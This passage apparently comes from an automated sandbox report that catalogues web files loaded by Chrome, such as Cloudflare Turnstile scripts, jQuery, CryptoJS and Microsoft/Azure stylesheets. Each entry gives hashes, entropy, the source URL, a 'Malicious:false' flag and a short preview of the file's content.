                                                                                                                          SHA-512:497484EF0BAB7D2F4ED38E8063D1BAED9C8B49775CCF490CFF0C2B9CE73265D8E5292DA9FCEEB22B4CED508B9930A6ADBB145E2E2DC458FAF67EBB706D3021D3
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/g/e4025c85ea63/api.js
                                                                                                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):32
                                                                                                                          Entropy (8bit):4.327819531114783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Aq7KKlMT9:AqeKWT9
                                                                                                                          MD5:A8A3710424DC6E0DFF393C6964441BDB
                                                                                                                          SHA1:E4978066791DD394BDDD174F2687A7CDD43442B2
                                                                                                                          SHA-256:46CD047CC0D3D10776E2F50D4C9D55DB58BD97D7A95B7D691F53D4937C71CF00
                                                                                                                          SHA-512:EE135EE50868E59853C8FE57A9471AE1FBBDE30A929D33B4A4D56200E70C93AFDFF0301EF7FEBC803258C2BA2DCBC183E632B2ADA1745D3C87C1EEB98E8DEE62
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://azure.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASHa8a3710424dc6e0dff393c6964441bdb.css
                                                                                                                          Preview:[class*="z-"]{position:relative}
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):48316
                                                                                                                          Entropy (8bit):5.6346993394709
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):89501
                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 53 x 4, 8-bit/color RGB, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):61
                                                                                                                          Entropy (8bit):4.035372245524405
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:yionv//thPlwBDl7shkxl/k4E08up:6v/lhPuhl8k7Tp
                                                                                                                          MD5:0D58AD029A53E17B50510C08E21C3822
                                                                                                                          SHA1:955A2746C62090D4BFDBDB78AE2B7F52AF69C62C
                                                                                                                          SHA-256:CB0973B3A6B8B91636C948D3437AE986C46C1392BE056B146F017375D44015F0
                                                                                                                          SHA-512:61C5BF6DEB5C9C3A0C913EAB3A105B15BAA3A38E860012C8903EF3881653037BFB7A669379603248721CBC148DCA3418EF2AC5B4CB4F422CEBF850BA7C3C2889
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8e82bfcf1ab94363/1732549357172/tddkygsc6Gt9a0U
                                                                                                                          Preview:.PNG........IHDR...5............/....IDAT.....$.....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65302)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):304858
                                                                                                                          Entropy (8bit):5.098842090973851
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:6kc1b3b99G9gR7N1xf6iKyqsNHHlYXklLHdkmBHV6ysv9S/NYWme0QWufThQWB3Q:x8vfThQ
                                                                                                                          MD5:561C834597FB9BC5AAC4021E21E006BE
                                                                                                                          SHA1:C535802C0C6171B4BE1A776034C330418B36983D
                                                                                                                          SHA-256:D8BAB22B1506E8444C64D92431F521964F658C380F5D32738AFEA85C15F03013
                                                                                                                          SHA-512:748BFA3F917C8E75699A52FFE0AB2F753262D1B73810ACF68523930B665EF10A85329BD63A2A7B39746154554EA7A195270D1326C98C77DE72F75E4EB14CBB2F
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-mwf-new/main-light.min.ACSHASH561c834597fb9bc5aac4021e21e006be.css
                                                                                                                          Preview:@charset "UTF-8";/*!. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */@font-face{font-family:MWF-FLUENT-ICONS;src:url(resources/fonts/MWFFluentIcons.woff2) format("woff2"),url(resources/fonts/MWFFluentIcons.woff) format("woff"),url(resources/fonts/MWFFluentIcons.ttf) format("truetype")}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.ttf) format("ttf");font-weight:400}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-euro
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):89501
                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):171486
                                                                                                                          Entropy (8bit):5.043877429718187
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCx1:jlZAW9kJeqg
                                                                                                                          MD5:B7AF9FB8EB3F12D3BAA37641537BEDC2
                                                                                                                          SHA1:A3FBB622FD4D19CDB371F0B71146DD9F2605D8A4
                                                                                                                          SHA-256:928ACFBA36CCD911340D2753DB52423F0C7F6FEAA72824E2A1EF6F5667ED4A71
                                                                                                                          SHA-512:1023C4D81F68C73E247850F17BF048615DDABB69ACF2429644BDAF8DC2A95930F7A29CEAE6FBD985E1162897483A860C8248557CDA2F1F3D3FF0589158625A49
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/43-5a5ab8/ca-ae3ce4?ver=2.0&_cf=02242021_3231
                                                                                                                          Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (26038)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1069563
                                                                                                                          Entropy (8bit):5.535109652203452
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:sIOfPLE1f09OTihO3oLGiUL3FxaKcpUhbpbHCKGAvyMZRDpctnaAPzGP1IB7HicH:sIOfPyf09OTihO3oLGiUL3FxaKcpUhby
                                                                                                                          MD5:38B2F85DD8903E4CCD65C752D0F0EEDC
                                                                                                                          SHA1:DA013AFD660F1544E5DC1770847D056CF567DB84
                                                                                                                          SHA-256:347B46765CD3C684B6769EBFDFF8F670CF2DD2E5158CFA108E778CD1742AF896
                                                                                                                          SHA-512:195EB7B68145801749DAB129548A7CEFEEBDA4D81DF61FDA6D9C0FC28A33720BA6F27391BC83AFF674BB6DFF09F71942EC50C6B02F966A1B778CA376A7E72F9C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:// Universal Media Player.// Build Date: 2024-11-21T21:21:10.013Z.// Commit: d6a61942c4187bd2c595b19f9b70c4a12ec7c8b5.// Build Number: 20241121.03../**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let L8=class extends Event{constructor(a,s,l){super("context-request",{bubbles:!0,composed:!0}),this.context=a,this.callback=s,this.subscribe=l??!1}};/**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. *//**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let R8=class{constructor(a,s,l,h){if(this.subscribe=!1,this.provided=!1,this.value=void 0,this.t=(d,m)=>{this.unsubscribe&&(this.unsubscribe!==m&&(this.provided=!1,this.unsubscribe()),this.subscribe||this.unsubscribe()),this.value=d,this.host.requestUpdate(),this.provided&&!this.subscribe||(this.provided=!0,this.callback&&this.callback(d,m)),this.unsubscribe=m},this.host=a,s.context!==void 0){const d=s;this.context=d.context,this.c
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):4054
                                                                                                                          Entropy (8bit):7.797012573497454
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                                                          MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                                          SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                                          SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                                          SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                                                                                                                          Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):406
                                                                                                                          Entropy (8bit):4.645093417199183
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:M9BAG1/qAT9BAs1/qKdDYT9BAR6T9BAOk/CMRZcJfRDZ:M9p/qS91/qfT9J9yRC5N
                                                                                                                          MD5:F9F2395C582FA601707B7A5DFAE9F05F
                                                                                                                          SHA1:27B15AECD0BFDD3B25556AC00755856D4D331E0D
                                                                                                                          SHA-256:D7D6D06624D4BDF6935B848DF342CE322D02B58D12BF12149DF92D557E5E9BC4
                                                                                                                          SHA-512:F3378927D96B0B172981A821A8C2A16D0F397ED92E835B7C46316FC48350402D972A5411F0FA4C260F205AA1F7917F83F8247BF8A62C7F22E0076B168275B1E9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://azure.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-uhf.min.ACSHASHf9f2395c582fa601707b7a5dfae9f05f.css
                                                                                                                          Preview:.c-uhfh .c-action-trigger.glyph-shopping-cart span:not(.shopping-cart-amount),.c-uhfh .c-action-trigger.glyph-shopping-bag span:not(.shopping-cart-amount){line-height:48px !important}..c-uhfh .c-action-trigger.glyph-shopping-cart:after,.c-uhfh .c-action-trigger.glyph-shopping-bag:after{line-height:43px}..c-uhfh.c-sgl-stck .c-search button{line-height:18px}..msame_Header_name{line-height:44px !important}
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):61
                                                                                                                          Entropy (8bit):3.990210155325004
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (26038)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1069563
                                                                                                                          Entropy (8bit):5.535109652203452
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:sIOfPLE1f09OTihO3oLGiUL3FxaKcpUhbpbHCKGAvyMZRDpctnaAPzGP1IB7HicH:sIOfPyf09OTihO3oLGiUL3FxaKcpUhby
                                                                                                                          MD5:38B2F85DD8903E4CCD65C752D0F0EEDC
                                                                                                                          SHA1:DA013AFD660F1544E5DC1770847D056CF567DB84
                                                                                                                          SHA-256:347B46765CD3C684B6769EBFDFF8F670CF2DD2E5158CFA108E778CD1742AF896
                                                                                                                          SHA-512:195EB7B68145801749DAB129548A7CEFEEBDA4D81DF61FDA6D9C0FC28A33720BA6F27391BC83AFF674BB6DFF09F71942EC50C6B02F966A1B778CA376A7E72F9C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.microsoft.com/videoplayer/ump.mjs
                                                                                                                          Preview:// Universal Media Player.// Build Date: 2024-11-21T21:21:10.013Z.// Commit: d6a61942c4187bd2c595b19f9b70c4a12ec7c8b5.// Build Number: 20241121.03../**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let L8=class extends Event{constructor(a,s,l){super("context-request",{bubbles:!0,composed:!0}),this.context=a,this.callback=s,this.subscribe=l??!1}};/**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. *//**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let R8=class{constructor(a,s,l,h){if(this.subscribe=!1,this.provided=!1,this.value=void 0,this.t=(d,m)=>{this.unsubscribe&&(this.unsubscribe!==m&&(this.provided=!1,this.unsubscribe()),this.subscribe||this.unsubscribe()),this.value=d,this.host.requestUpdate(),this.provided&&!this.subscribe||(this.provided=!0,this.callback&&this.callback(d,m)),this.unsubscribe=m},this.host=a,s.context!==void 0){const d=s;this.context=d.context,this.c
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3280
                                                                                                                          Entropy (8bit):4.696081700274861
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:mVZw3gPuCrA3sLT1m7RArtNmOuLT2LZ0dZyMLtZ/AmVT8TZi:mVZ4gPuCQqBQRArtMOEalxMLtZ47i
                                                                                                                          MD5:1C7E214F5AF8CAA06F783A38D40127C6
                                                                                                                          SHA1:61F88B722FAA7A7AE86D354DBCFC1D771FF23289
                                                                                                                          SHA-256:9EA42247944D18B77EB76FBCCAF1774559B6F312B1376002F553C4ECB827E4C5
                                                                                                                          SHA-512:559A3FA3364B742E5915E871333C043CF27F25110D3A624D0CDDC75DEE795F8633EB0C8A3186F2088B52516C1BC3A90F13545F9415278F3A4A52992AB7E8C96C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-onecloud-util.min.ACSHASH1c7e214f5af8caa06f783a38d40127c6.js
                                                                                                                          Preview:class OneCloudUtil {.. /**. * Get the API endpoint for the OneCloud Data Connector.. * @param {string} path - The path to append to the API endpoint.. * @param {string} querystring - The query string to add to the API endpoint.. * @returns {string} - The API endpoint with the environment specific query parameters.. */. static getMsocapiurl = (path, querystring) => {. let url = `${OneCloudEnvironmentConstants.DataConnector.endpoint}${path}`;. let envQueryParamKeys = Object.keys(OneCloudEnvironmentConstants.DataConnector.queryParams);.. // Add passed query string.. if(querystring && querystring.length > 0) {. url += `?${querystring}`;. } else if (envQueryParamKeys.length > 0) {. url += '?';. } .. // Add environment specific query parameters and return.. return OneCloudUtil.addEnvironmentSpecificQueryParams(url);;. }.. /**. * Add environment specific query parameters to the url.. * @param {string} url - The url to add the query paramete
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):203
                                                                                                                          Entropy (8bit):4.6712092041548265
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:lTjYues7JVLt0dalnfJTTjYsQb7JVLt0dw:y5s7JVLTpfJU97JVLj
                                                                                                                          MD5:44700D76F3F63FA33F30039BB9C74B39
                                                                                                                          SHA1:F68B158102C2575081CB4308E4FEA483E1B9D604
                                                                                                                          SHA-256:FD73C7131FEA30896A95BC1D0E9F08F383FEFB03730DB9A433F43B319EFF33AC
                                                                                                                          SHA-512:2665D21274DB60A9BC6BCC7100DF57C2EE0E2264601A295902CC0E958CBA2B198E4C1AB6291947A8F33DC46D42AE0E1F586369CB3F3B011C751C81EFA755C234
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-action.min.ACSHASH44700d76f3f63fa33f30039bb9c74b39.css
                                                                                                                          Preview:body div[data-geo-country="US"] .us-hidden:not([data-isenvauthor="true"]){display:none}.body div[data-geo-country]:not([data-geo-country="US"]) .non-us-hidden:not([data-isenvauthor="true"]){display:none}
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (64796)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):599616
                                                                                                                          Entropy (8bit):5.113656139190045
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:1wWdhqRnrdICH1BdTZXire7Dqsx0C9i98nrBsMJgKb+R8yr:ZqWKk
                                                                                                                          MD5:4F5B941AF93F4C163D791B3FDE931EF4
                                                                                                                          SHA1:2E705DECB818774EBCBE4F7B6A136A521B846A43
                                                                                                                          SHA-256:9CE154E918E2ACACA2559883C34E9D2DCA2E5596AFBE4D02C0F774CC57ADD206
                                                                                                                          SHA-512:0A4EB1C8089EC8A15D84CE6102BFAF230C5B56C5FD3A782A5812770734B7B19488B249482CF5FA912E9BBD3A6892F9541F5B3C18602D9FE91A9B5A2A01C6AA39
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine/main-azure.min.ACSHASH4f5b941af93f4c163d791b3fde931ef4.css
                                                                                                                          Preview:@charset "UTF-8";/*!. * OneCloud Reimagine v0.298.0. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc.. */.fixed-back-to-top{transition:opacity 1s cubic-bezier(.19,1,.22,1)!important;pointer-events:none}@media (prefers-reduced-motion:reduce){.fixed-back-to-top{transition:none}}.fixed-back-to-top.fixed-sticky.stuck{transition:opacity 1s cubic-bezier(.19,1,.22,1)!important}@media (prefers-reduced-motion:reduce){.fixed-back-to-top.fixed-sticky.stuck{transition:none}}@media screen and (max-width:540px){.fixed-back-to-top.stuck{position:static}}.fixed-back-to-top .btn{pointer-events:auto}.fixed-sticky{transition:background .2s ease-out,shadow .2s ease-out}.fixed-sticky .sticky-show-stuck{display:none}.fixed-sticky.get-height .sticky-show-stuck{display:block;visibility:hidden;opacity:0;position:fixed;left:-9999px;width:100%}.fixed-sticky.stuck{position:fixed;left:0;right:0;width:100%;z-index:1020;t
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (47694)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):47695
                                                                                                                          Entropy (8bit):5.401533135534308
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:IXCtQmIutwVHozZBF6gmXLSOzQDjdadOQbk6sgEvxm7b39tobLKZUenw81KZLGcD:IGJWHozZBF6xbGeLsVvQ33FUeDW
                                                                                                                          MD5:481EDB6F4045F16980C920CCD9705105
                                                                                                                          SHA1:D8CB40ABC935DC65D25D83D8358F52AC88742F73
                                                                                                                          SHA-256:5F7C821EEA52471A9BBB0397DF6B77EE279505BE05BB52AEF00932989522D3C2
